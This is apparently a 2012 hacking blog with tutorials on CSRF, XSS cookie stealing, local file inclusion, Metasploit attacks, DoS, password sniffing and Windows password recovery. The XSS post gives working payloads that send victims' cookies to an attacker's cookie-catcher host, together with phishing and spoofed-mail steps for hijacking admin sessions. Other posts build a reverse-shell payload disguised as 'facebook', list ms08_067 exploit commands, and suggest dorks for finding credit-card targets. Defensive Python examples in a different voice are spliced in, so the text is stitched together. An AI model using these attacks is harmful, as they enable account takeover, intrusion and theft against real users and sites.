Sunday, October 28, 2012

How to exploit CSRF vulnerability (CSRF tutorial)?

Today I'm going to explain a web vulnerability that not everyone knows about, although it is very popular. This vulnerability is very dangerous and effective, and exploiting it usually leaves no evidence. It is called Cross-Site Request Forgery (CSRF). CSRF, and the way to exploit it, is extremely easy; much easier than all the complicated injections.

How does it work?

It works by forcing the victim's browser to send HTTP requests that carry out a range of actions, for example:
  • Permission faking/stealing.
  • Transfer of funds from the Bank
  • Disruption of the normal sequence of the site
And much more.

Online Hacking tools

Here are some online hacking tools. If your internet connection is slow, you may not want to download security software just for information gathering and exploit searching, so you can use online websites for this purpose. A big advantage is that your IP is not directly exposed to the victim. If you use a proxy it is more secure, because the website does not have your IP either.

http://www.novirusthanks.org/ (Online File Scanner)
http://www.virustotal.com (Online File Scanner)
http://anubis.iseclab.org/ (Online File Scanner)
http://www.ipvoid.com/ (IP Address scanner)
http://www.threatlog.com/ (HoneyPot Database)
http://www.idoproxy.com (proxy)
http://whois.domaintools.com/ (Whois lookup)
http://www.robtex.com/ (swiss army knife internet tool)
http://www.netirk.com/ (Pinger)
http://www.ahbl.org/lktool (IP Lookup)
http://www.blocklist.de/
http://www.cirt.net/passwords (Default password list)
http://www.cirt.net/ports (Default Ports List)
http://www.urlvoid.com/extract-url/ (URL Shortener extractor)
http://www.urlvoid.com/http-headers/ (Show the HTTP headers of a link)
http://www.urlvoid.com/find-parasites/ (Find Parasites)
http://www.urlvoid.com/url-dump/ (URL Dump)
http://www.fail2ban.org/wiki/index.php/Main_Page (For your website)
http://www.nmap.org (port scanner)

Wednesday, October 24, 2012

What you can do after hacking remote pc?

If you know the command line interface very well, then you can operate the remote PC like a local PC.
Here I am listing some basic Metasploit commands to operate a remote PC from your terminal.

But before that you have to exploit the remote PC. For this purpose check my previous posts on “How to hack remote pc” here.

(1) How to gather the installed applications on the victim PC.
Here are the commands:
msf > use post/windows/gather/enum_applications
msf post(enum_applications) > set session 1
msf post(enum_applications) > exploit

(2) How to gather the USB drive history of the victim PC?
Here are the commands:
msf > use post/windows/gather/usb_history
msf post(usb_history) > set session 1
msf post(usb_history) > exploit

How to jam WIFI network in UBUNTU & BACK TRACK?

If you have Ubuntu or BackTrack installed, you can skip the first six steps and start directly from step 7. If you are a Windows user, start from here.

Step 1: Download Backtrack 5 R2 here as .iso for 32 bit: http://www.backtrack-linux.org/ajax/down...OME-32.iso
and 64 bit: http://www.backtrack-linux.org/ajax/down...OME-64.iso

Step 2: Download UNetbootin for Windows: http://unetbootin.sourceforge.net/unetbo...latest.exe

Step 3: Insert your FAT32 formatted flash/hard drive and open UNetbootin.

Step 4: At the bottom of UNetbootin you'll see it says Disc Image. Select ISO and find your file.
Type: USB-drive.
Letter: H:\ or whatever your computer says.
Then press on OK and let it finish.

Step 5: When it's done, press on Reboot now and when you're booting, remember to boot on your flash/hard drive. I use F12 when I'm booting to change, but it depends on each computer.

How to download youtube video?

There are lots of methods for downloading YouTube videos. Here I am listing some commonly used methods.

(1) It's very easy: download YouTube downloader from here and install it. Open the software, then copy and paste the video URL into it. But here is the problem: if your connection is lost, the download cannot be resumed.

(2) Copy the video URL from YouTube, then open http://keepvid.com or http://savevid.com and paste the video URL into their site. For this purpose you should have Java installed.

(3) This is my favourite method. No software or plugin is needed. If you want to download the following video
http://youtube.com/watch?v=Y4E9brXa6hA then just put ss at the beginning of the URL, like http://ssyoutube.com/watch?v=Y4E9brXa6hA, and copy and paste it into your browser's address bar.

(4) If you have Internet Download Manager installed, it will automatically download when you start watching the video. You can download the full crack version of Internet Download Manager from here.

How to change MAC address?

Changing Your MAC Address In Windows XP/Vista, Linux And Mac OS X
(Sometimes known as MAC spoofing)

First let me explain a few things about MAC addresses. MAC stands for Media Access Control and in a sense the MAC address is a computer's true name on a LAN. An Ethernet MAC address is a six byte number, usually expressed as a twelve digit hexadecimal number (Example: 1AB4C234AB1F).

IPs are translated to MAC addresses by a protocol called ARP (Address Resolution Protocol). Let's say a computer with an IP of 192.168.1.1 wants to send information to another computer on the LAN that has an IP of 192.168.1.2. First 192.168.1.1 will send out a broadcast to all stations on the LAN asking who has the IP 192.168.1.2. Then the box that has 192.168.1.2 will respond to 192.168.1.1 with its MAC address, which is cached in 192.168.1.1's ARP table for later use. To put this in Socratic Dialog form (with just a touch of Stallone):

Host 1 (192.168.1.1): Yo everyone on the LAN (FF:FF:FF:FF:FF:FF), who has the IP 192.168.1.2? My MAC is DE:AD:BE:EF:CA:FE so you can respond back to me.
Host 2 (192.168.1.2): Hello DE:AD:BE:EF:CA:FE, I have IP 192.168.1.2 and my MAC address is 12:34:56:78:90:12 so you can send your IP packets to me.

You can see the ARP table of a box by dropping out to a command prompt and typing "arp -a" in Windows or just "arp" in Linux. ARP can also work the other way, by a host on the LAN sending its MAC address to another machine on the LAN for preemptive caching, unless the host is configured to not accept un-requested ARP replies.
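
Why a host is configured to refuse un-requested ARP replies, as an added example that is not part of the original post: a toy ARP cache in Python replays the Host 1 / Host 2 exchange above and then a reply nobody asked for. The class, its method names and the second MAC address are constructed for illustration.

```python
from dataclasses import dataclass, field


@dataclass
class ArpCache:
    """Toy ARP cache for one host. strict=True refuses un-requested replies."""
    strict: bool = True
    table: dict = field(default_factory=dict)   # IP -> MAC
    pending: set = field(default_factory=set)   # IPs we have asked about
    alerts: list = field(default_factory=list)

    def request(self, target_ip):
        """Record that we broadcast 'who has target_ip?' to FF:FF:FF:FF:FF:FF."""
        self.pending.add(target_ip)

    def reply(self, sender_ip, sender_mac):
        """Process an incoming ARP reply. Returns True if it was cached."""
        sender_mac = sender_mac.upper()
        known = self.table.get(sender_ip)
        if known is not None and known != sender_mac:
            # Same IP, different MAC than the one already cached.
            self.alerts.append(f"{sender_mac} claims {sender_ip}, cached as {known}")
        if sender_ip not in self.pending:
            self.alerts.append(f"un-requested reply for {sender_ip} from {sender_mac}")
            if self.strict:
                return False                    # keep the existing binding
        self.pending.discard(sender_ip)
        self.table[sender_ip] = sender_mac
        return True


def replay(strict):
    """Replay a constructed sequence as seen by Host 1 (192.168.1.1)."""
    cache = ArpCache(strict=strict)
    cache.request("192.168.1.2")                      # Host 1 asks
    cache.reply("192.168.1.2", "12:34:56:78:90:12")   # Host 2 answers
    # Constructed: a later reply nobody asked for, claiming the same IP.
    cache.reply("192.168.1.2", "66:77:88:99:AA:BB")
    return cache


if __name__ == "__main__":
    for mode in (True, False):
        c = replay(mode)
        print("strict" if mode else "permissive", c.table, c.alerts)
```

In strict mode the cached binding for 192.168.1.2 survives and both alerts are raised; in permissive mode the same alerts fire but the table entry is overwritten.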

Sunday, October 21, 2012

how to do XSS Attack on website?

Hi. XSS comes in 2 types: Persistent and Non-Persistent.

For XSS we will use something called a cookie catcher.
The question is: why would we need someone else's cookie?
The answer is that we can change our browser's cookies to log in as them!!! So let's call it Session Hijacking.
First go to a free hosting site like http://www.110mb.com or other PHP hosting sites and register there. Then download this cookie catcher and upload it.
Cookie Catcher:  http://www.4shared.com/file/oCnEgaDr/cookie_catcher.html

What does the cookie catcher do?

It grabs the user's:

    Cookies
    IP
    Referrer (the page that led to that link)
    Time and Date

Get Vulnerable sites:

OK, first we need sites that are vulnerable to XSS, so it will work on them.
To test it we will need to add a code after the link.
I will use this site, which many of you have probably seen before.
site: click here. Now, to test whether a site is vuln or not, you can add these codes:

code:

"><script>alert(document.cookie)</script>

code:

'><script>alert(document.cookie)</script>

code:

"><script>alert("test")</script>

code:

'><script>alert("test")</script>

code:

"><body bgcolor="FF000"></body>

code:

"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>


If you see a JavaScript popup, or if you used my testing and you saw the page's background go black or a page of Google open inside that site, it means the site is vulnerable to XSS attacks.
In the end, if your site is http://www.example.com the link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script>


Persistent XSS:

In this method we will grab the victim's cookies without raising suspicion and completely stealthily.
Now assume we have a forum which has HTML enabled, or a site which has a comment page which is vulnerable to XSS.
OK, now let's go to this site: click here
Now test and see if the XSS vulnerability tests work on it.
It does!!! And you're getting one of the vulnerability's symptoms. So now let's try to grab its cookies. If there is a box to type in and submit, add this:

code

<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

and submit that post in the forum or the comment box. It's also good to add something before the code, like: hey i got a problem logging in???
so they won't suspect you. Refresh the page, then go to the newly created page: in the same directory where you saved your cookie catcher .php, look for cookies.html, which is a new file that shows you the cookies. For example, if your cookie catcher link is:
http://www.example.com/cookie catcher.php
the container of the cookies would be:
http://www.example.com/cookies.html
Now visit cookies.html and you will see the session of that cookie!
PS: the site I used doesn't support cookies, so you can use: click here for cookie supporting.

Now there is another way for a cookie grabbing drive by, add this code and post it:

Code:

<iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="www.you.110mb.com/cookie catcher.php?c="+document.cookie) </iframe>

Then post it in the forum or the comment box.
Now this will open an iframe in the page, which will allow you to have the same page in that website. If you don't know about iframes, make a new HTML file on your computer and just do a

<iframe src="www.google.com"></iframe> and you will understand iframes more.

Of course the site needs to have cookies supported! A blank JavaScript means you need to go to another site.

Non-Persistent XSS:

OK, in this method we will make the victim admin go to our link. First we will pick an XSS vuln site. For this method we will need a search.php page which is vuln to XSS and has cookies in that page. In the vuln search.php, in the textbox for the word to search for, type:

code:

<script>alert(document.cookie)</script>

and click the search button. If you see a JavaScript popup, it means it's vuln to a Non-Persistent XSS attack. OK, now we will do something similar.
I will use this link for this method: click here
Now in front of the search.php?search= add this:

Code:

"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

Now go to http://www.tinyurl.com and shrink the whole page's link. Try to find a site administrator's e-mail in that vuln website and send a fake mail from an online fake mailer like this one:

http://tipstrickshack.blogspot.com/2012/09/how-to-spoof-email-addresses.html

Now in the body just say something fake like: Hey i found a huge bug in your website! and give him the shrunk link of the search.php which you added the code in front of. The Tinyurl will mask it, and once he goes to the link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookie catcher. No matter what he does, even if he changes his password, you can still log in as him.

Session Hijacking:

OK, now you have the admin's cookies either way, so we need to edit our own browser's cookies. First go to that page's admin login or its main page and delete ALL of your cookies from that page. Now go to your cookies.html page and copy everything in front of the Cookie: into an open Notepad window. The ; separates cookies from each other, so first copy the code before the ; .
Now go to that vuln website and clear the link. Instead add this:

Code:

Javascript:void(document.cookie="")

or for an example:

Code:

Javascript:void(document.cookie="__utma=255621336.1130089386.1295743598.1305934653.1305950205.86")

Then visit the link. Do this with all of the cookies and refresh the page. And wham!!! You're logged in as administrator :)
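
The defensive side of the tests above, as an added example that is not part of the original post: the tutorial's own test strings are echoed into a form field with and without HTML escaping, and the session cookie is issued with HttpOnly so that document.cookie cannot read it. The function names, the form field and the cookie name are assumptions for illustration.

```python
import html
from html.parser import HTMLParser
from http.cookies import SimpleCookie

# Test strings quoted from the tutorial, paired with the attribute quote they target.
PAYLOADS = [
    ('"', '"><script>alert(document.cookie)</script>'),
    ("'", "'><script>alert(document.cookie)</script>"),
    ('"', '"><body bgcolor="FF000"></body>'),
]


def render_search_box(term, quote='"', escape=True):
    """Echo the search term back into an attribute, as a search.php-style page would."""
    if escape:
        term = html.escape(term, quote=True)   # & < > " ' all become entities
    return f"<input name={quote}search{quote} value={quote}{term}{quote}>"


class _Tags(HTMLParser):
    """Collect every start tag the parser sees, plus the input's value."""
    def __init__(self):
        super().__init__()
        self.tags, self.value = [], None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.value = dict(attrs).get("value")


def parse(markup):
    """Return (list of start tags, value of the input field)."""
    p = _Tags()
    p.feed(markup)
    p.close()
    return p.tags, p.value


def session_cookie(token):
    """Set-Cookie value for a session cookie that page scripts cannot read."""
    c = SimpleCookie()
    c["session"] = token
    c["session"]["httponly"] = True    # hidden from document.cookie
    c["session"]["secure"] = True      # only sent over HTTPS
    c["session"]["samesite"] = "Lax"
    c["session"]["path"] = "/"
    return c["session"].OutputString()


def report():
    """For each payload: tags created unescaped, tags created escaped, round-trip ok."""
    rows = []
    for quote, payload in PAYLOADS:
        raw_tags, _ = parse(render_search_box(payload, quote, escape=False))
        safe_tags, safe_value = parse(render_search_box(payload, quote, escape=True))
        rows.append((payload, raw_tags, safe_tags, safe_value == payload))
    return rows


if __name__ == "__main__":
    for row in report():
        print(row)
    print(session_cookie("constructed-token"))
```

Unescaped, each string closes the attribute and creates a second element; escaped, the page contains only the input element and the user still sees exactly what they typed in the field.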

Friday, October 19, 2012

Hack IIS vulnerability & exploit it

IIS Exploit website Hacking in Windows 7, Step By Step Explained with Images
Step 1 - click to see
(Go to My Computer, right-click and select Add a network location)
Step 2 - click to see
(Click on Next)
Step 3 - click to see
(Click on Next)
Step 4 - click to see
(Now enter the URL of the vuln website and click on Next. For example, take this site: http://www.myxixia.com/)

Thursday, October 18, 2012

How to Find Vulnerable website?

First of all, this is for newbies who have problems finding vulnerable websites.


- The important thing is : To Be Creative !


Why you need to be creative??


Well, take this dork as an example: "inurl:members.php?id=". A lot of people are using it, so if you use it you'll probably just find yourself trying to hack a website that is already hacked or whose database is fucked. Even if you think about skipping to page rank 100+, well, you're not the only one who thought of this idea. Anyway, the meaning of "be creative" is to add some keywords to your dorks, for example "inurl:members.php?id= shop"; this dork can be useful if you're trying to get some credit card numbers.

How to do Local File inclusion?

Local File Inclusion is a common website hacking trick. This tutorial will show you how to exploit a website using L.F.I.
First of all, take a look at the given PHP code.
<?php
// The page name comes straight from the query string, with no validation
$page = $_GET['page'];
include($page);
?>

The code above is commonly used on websites by web developers, but it should not be, because $page isn't sanitized and is passed directly to include(). This code is used by hackers for L.F.I.
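
The fix for the include above is to stop treating the page parameter as a path. This added example (not the original author's code; written in Python so the logic can be run and tested, with hypothetical page names) maps the parameter through an allowlist and checks that the resolved file stays inside the pages directory.

```python
import os
import tempfile

# Hypothetical allowlist: the only values the page parameter may take.
ALLOWED_PAGES = {"home": "home.php", "about": "about.php", "contact": "contact.php"}


def resolve_page(page_param, pages_dir):
    """Return the absolute path that may be included, or None to refuse."""
    filename = ALLOWED_PAGES.get(page_param)
    if filename is None:
        return None                      # not a known page: never touch the disk
    base = os.path.realpath(pages_dir)
    candidate = os.path.realpath(os.path.join(base, filename))
    # Containment check: also catches a symlink planted inside pages_dir.
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def demo():
    """Build a constructed site layout and resolve a few constructed requests."""
    with tempfile.TemporaryDirectory() as root:
        pages = os.path.join(root, "pages")
        os.mkdir(pages)
        for name in ("home.php", "contact.php"):
            with open(os.path.join(pages, name), "w") as fh:
                fh.write("<?php /* constructed page */ ?>")
        outside = os.path.join(root, "outside.txt")
        with open(outside, "w") as fh:
            fh.write("constructed file outside the pages directory")
        # about.php is an allowlisted name, but here it is a symlink that leaves pages/.
        os.symlink(outside, os.path.join(pages, "about.php"))
        requests = ["home", "about", "../../etc/passwd", "home.php", ""]
        return {p: resolve_page(p, pages) for p in requests}


if __name__ == "__main__":
    for param, path in demo().items():
        print(repr(param), "->", path)
```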

Monday, October 15, 2012

Hack Linux OS using METASPLOIT

The most common use of msfpayload tool is for the generation of shellcode for an exploit that is not currently in the Metasploit Framework or for testing different types of shellcode and options before finalizing a module.

msfpayload linux/x86/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 x > /root/Desktop/facebook


Now we have successfully generated the malicious exe file; it will be stored on your local computer at /root/Desktop/facebook

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

Open your terminal & type following commands.

msfconsole

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp

set lhost 192.168.1.6

set lport 4444

exploit


Now send your facebook.exe file to the victim. As soon as they download and open it, you can access a meterpreter shell on the victim's computer.

Saturday, October 13, 2012

How to Find Email-Address of the domain using metasploit?

First open your terminal and type the following commands:
msfconsole
use auxiliary/gather/search_email_collector
show options

The next step is to set the domain whose email addresses you want to locate.
Once the domain is set, the default search engines that will be used for this search are Google, Bing, and Yahoo.
Now type
set domain “name of domain” (without quotes) and press Enter.
Then type run and press Enter.
It will search for email addresses of the domain in Google, Yahoo and Bing.


Friday, October 12, 2012

How to hide secret file in image?

Hello friends. Today we learn about another trick of steganography. In the past we learned how to hide text in Notepad. Now we learn how to hide a confidential file in an image.

Requirement
Command prompt.

Before we begin: I have one secret file named secret.pdf, which I do not want other people to know about, and also a picture named apple.jpg. I put both files in my personal folder named pictures.

  1. Open the command prompt.
  2. Change directory to the pictures folder in the command prompt.
  3. Compress your secret file (secret.pdf) using WinRAR.
  4. Next, in the command prompt, type the following code:
    copy /b [image_filename].jpg + [rar_filename].rar nkd.jpg
    For our example the code becomes
    copy /b apple.jpg + secret.rar nkd.jpg
    Here nkd.jpg is our new file, which contains the hidden document.
  5. Go to your pictures folder; you can see nkd.jpg.
  6. To view the original file there is nothing more to do: just open the file with WinRAR, or you can also change the extension from jpg to rar.
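
A file made this way still opens as a picture because image viewers stop at the JPEG end-of-image marker, which also makes the appended archive easy to spot. This added example (not from the original post; the sample bytes are constructed) walks the JPEG markers to the end of the image and reports anything appended after it, including a RAR signature.

```python
RAR_MAGIC = b"Rar!\x1a\x07"   # common prefix of the RAR 4 and RAR 5 signatures


def jpeg_end_offset(data):
    """Offset just past the EOI marker of the leading JPEG, or None if malformed."""
    if data[:2] != b"\xff\xd8":                      # SOI
        return None
    i = 2
    while i + 1 < len(data):
        if data[i] != 0xFF:
            return None
        marker = data[i + 1]
        if marker == 0xD9:                           # EOI: image ends here
            return i + 2
        if marker == 0xFF:                           # fill byte before a marker
            i += 1
            continue
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:  # markers without a length
            i += 2
            continue
        if i + 4 > len(data):
            return None
        seglen = int.from_bytes(data[i + 2:i + 4], "big")
        if seglen < 2:
            return None
        i += 2 + seglen                              # skip the whole segment
        if marker == 0xDA:                           # SOS: entropy-coded data follows
            # Skip scan bytes; FF00 is a stuffed byte and FFD0..FFD7 are restarts.
            while i + 1 < len(data) and (
                data[i] != 0xFF or data[i + 1] == 0x00 or 0xD0 <= data[i + 1] <= 0xD7
            ):
                i += 1
    return None


def inspect_image(data):
    """Report whether data is a JPEG and what, if anything, follows the image."""
    end = jpeg_end_offset(data)
    if end is None:
        return {"jpeg": False, "trailing_bytes": 0, "rar_offset": None}
    trailing = data[end:]
    pos = trailing.find(RAR_MAGIC)
    return {"jpeg": True, "trailing_bytes": len(trailing),
            "rar_offset": None if pos < 0 else end + pos}


# Constructed sample: a structurally valid marker stream, not a viewable picture.
CLEAN_JPEG = (
    b"\xff\xd8"                                                        # SOI
    b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"   # APP0
    b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00"                        # SOS header
    b"\x12\x34\xff\x00\x56\xff\xd0\x78"                                # scan data
    b"\xff\xd9"                                                        # EOI
)
# Constructed stand-in for the output of: copy /b apple.jpg + secret.rar nkd.jpg
COMBINED = CLEAN_JPEG + RAR_MAGIC + b"\x00" + b"constructed archive body"

if __name__ == "__main__":
    print(inspect_image(CLEAN_JPEG))
    print(inspect_image(COMBINED))
```

Some legitimate formats also place data after the first image, so non-zero trailing bytes alone call for a closer look, while a RAR signature directly after EOI matches the copy /b trick described here.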

Tuesday, October 9, 2012

Some Metasploit Attacks

Today I will show you some Metasploit attacks.
Requirement:-
Backtrack.
Metasploit.

These are just some commands; there are lots of options in Metasploit. You can use them according to the vulnerability.

Attack 1: Hacking Windows XP with Metasploit tutorial - VNC remote control

use windows/smb/ms08_067_netapi
show options
set RHOST 192.168.1.1 ----->IP target
set payload windows/vncinject/bind_tcp
exploit

Saturday, October 6, 2012

DOS attack from linux using hping3.

I am here to explain DoS attacks (with practicals). You all know about the DoS attack, the Denial-of-Service attack. In this attack, the attacker denies users the use of a particular service. There are many tools for DoS attacks, but I'm going to teach you a simple method for stress testing a service.
We need hping3 (it is available on Linux only; you can use hping2 on Windows, but I can't assure you that it will work for this practical). Download hping2/3 here.


OK, so let's bring down some services.

How to enable right click in web-site?

Why is right click disabled?

Right-clicking your mouse can be very useful when surfing the web. It allows you to save images on webpages to your hard disk, to view the source of a particular webpage, to download background music from a blog (when the website code isn't complicated), and much more.
Nowadays, many websites and blogs don't allow you to right-click on their pages. I studied HTML and basic web designing, so I like to look at a webpage's HTML code when I find a new interesting website. And it makes me angry to find out that I can't right-click. But as you know, there is always a way to get around something.
Just follow this step.


Go to your browser's options and disable JavaScript, then reload the site. Now you can right-click on the website or blog.

Friday, October 5, 2012

How to Sniff HTTP POST Password via Network Using Wireshark Network Analyzer?

    Nowadays most websites around the world, more than 50% of them (in my opinion), do not provide secure access to a personal profile or to pages that require an authentication process where users input their username and password. As we know, data sent via port 80 (HTTP) is plain and without any encryption.
    This tutorial can be an angel and also a devil at the same time; it depends on who uses this tutorial and for which purpose… As the writer of this tutorial I just hope that all of you can be an angel and know the bad things that can happen from it, because I believe that none of you wants your password sniffed by someone out there, so don't do that to others either.
    Requirements:
    1. Wireshark Network Analyzer (wireshark.org)
    2. Network Card (Wi-Fi Card, LAN Card, etc.). FYI: for Wi-Fi it should support promiscuous mode.

How to remove watermark from image online?

step 1
Open an Internet browser window and navigate to "http://www.pixlr.com/editor/." This is a free
online image editor. You can upload images from your computer, create new images or specify
the URL of the image you wish to edit. Choose either to "Open an Image from your Computer"
or "Open Image from URL." Browse to your desired image or type in the URL of the image's location.

step 2
Select the Clone Stamp Tool from the toolbox at the left of the screen. The tool looks like a
small stamp with an arrow in it and is located beside a pencil. You can also press "S" to select the
tool.

step 3
Select an area of the image that is comparable to any portion of the watermark you need to
remove. For instance, if part of the watermark is on a dark green area of the image, choose a
portion of the image that's roughly the same color as source point. The Clone Stamp Tool
needs a comparable source point to replace the watermark with the colors from the source.
Press "Ctrl" and left-click with your mouse when you have a source point.

step 4
Position the center of the Clone Stamp Tool over the area of the watermark you wish to
replace with the source point. Left click once to begin painting over the area. You may need to
repeat the process two or three times to completely remove each portion of the watermark.

step 5
Zoom in on your image using the Zoom Tool that looks like a magnifying glass. This will allow
you to see if you've successfully removed all of the watermark. If you haven't, you can still
use the Clone Stamp Tool while zoomed in to finish the removal process.

Thursday, October 4, 2012

How To Hide Text in Notepad?

Steganography is the art of writing hidden messages so that no one suspects the existence of the message. The meaning of steganography is "concealed writing", and that is what we are going to do. We are going to learn how to write hidden text in the Microsoft Windows text editor Notepad. We should learn this technique so that we can easily hide our personal information on a computer without any password-protection tools, which are paid tools: we have to pay to use them to protect our text data from unauthorized users. Below I have described, with screenshots, how to hide text data in Notepad.

Monday, October 1, 2012

How to Recover Windows 7 password in ubuntu?

(1) First boot Ubuntu from a live CD.

(2) Open Ubuntu Software Center, search for CHNTPW and install the package. If you do not have an internet connection on the PC with the lost password, download it from here.

(3) Now open a terminal and type the following command:
 cd /media/"drive name of windows 7 partition"/Windows/System32/config
Use the drive name of the partition on which Windows 7 is installed, without the quotes.

(4) Now type sudo chntpw SAM and press Enter. Then press 1 and restart the PC.


HOW TO run .Exe files with wine ?

If you run a .exe file with wine and see "The file '/home/[username]/example.exe' is not marked as executable. If this was downloaded or copied from an untrusted source, it may be dangerous to run. For more details, read about the executable bit." or anything like that, then this tutorial is for you!

EDIT: (Actually, this will work on any linux computer but in fluxbox when you right-click on the .exe file and go to the permissions tab there is no mark as executable checkbox [for me] So we have no other choice but to do it via terminal)

The only thing we have to do is mark it as executable. [which will be explained below]

I will take the example of example.exe

It is located in /home/[username]/Downloads

First, I will go to /home/[username]/Downloads or whatever the folder is

If you did this (go to the folder) with a file manager then (after you are in the folder where the .exe file is present) right click on an empty space on the folder---> then click open in terminal.

A terminal should pop up.

In the terminal type ls

just to see if your file is there. If it isn't, then you are not in the correct folder. NOTE: The file name should NOT have any spaces. If it does, go back to the folder where it is, right-click it and click Rename, delete the spaces, then continue:

Type

chmod 544 example.exe

(Replace example.exe with your .exe file)


Now go to the .exe file with your file manager. You should see a lock on it. This means that it is executable.

Click on it. It will open! If it doesn't, then either the file can't be opened by wine or you need to upgrade your wine version.

And that's the end of the tutorial!

How To Recover Windows 7 password?

Here is the tutorial on how to recover a forgotten password for XP, Vista and Win 7.

(1) First you have to boot from another OS like Ubuntu, BackTrack or any other which comes in live CD format. Run the OS from the CD. (You can also run the OS from a pendrive; it's faster than a CD.)

(2) Copy the "sam" and "system" files from this location: C:/WINDOWS/SYSTEM32/CONFIG (these files contain your password in NTLM hash form) and save them on your pendrive.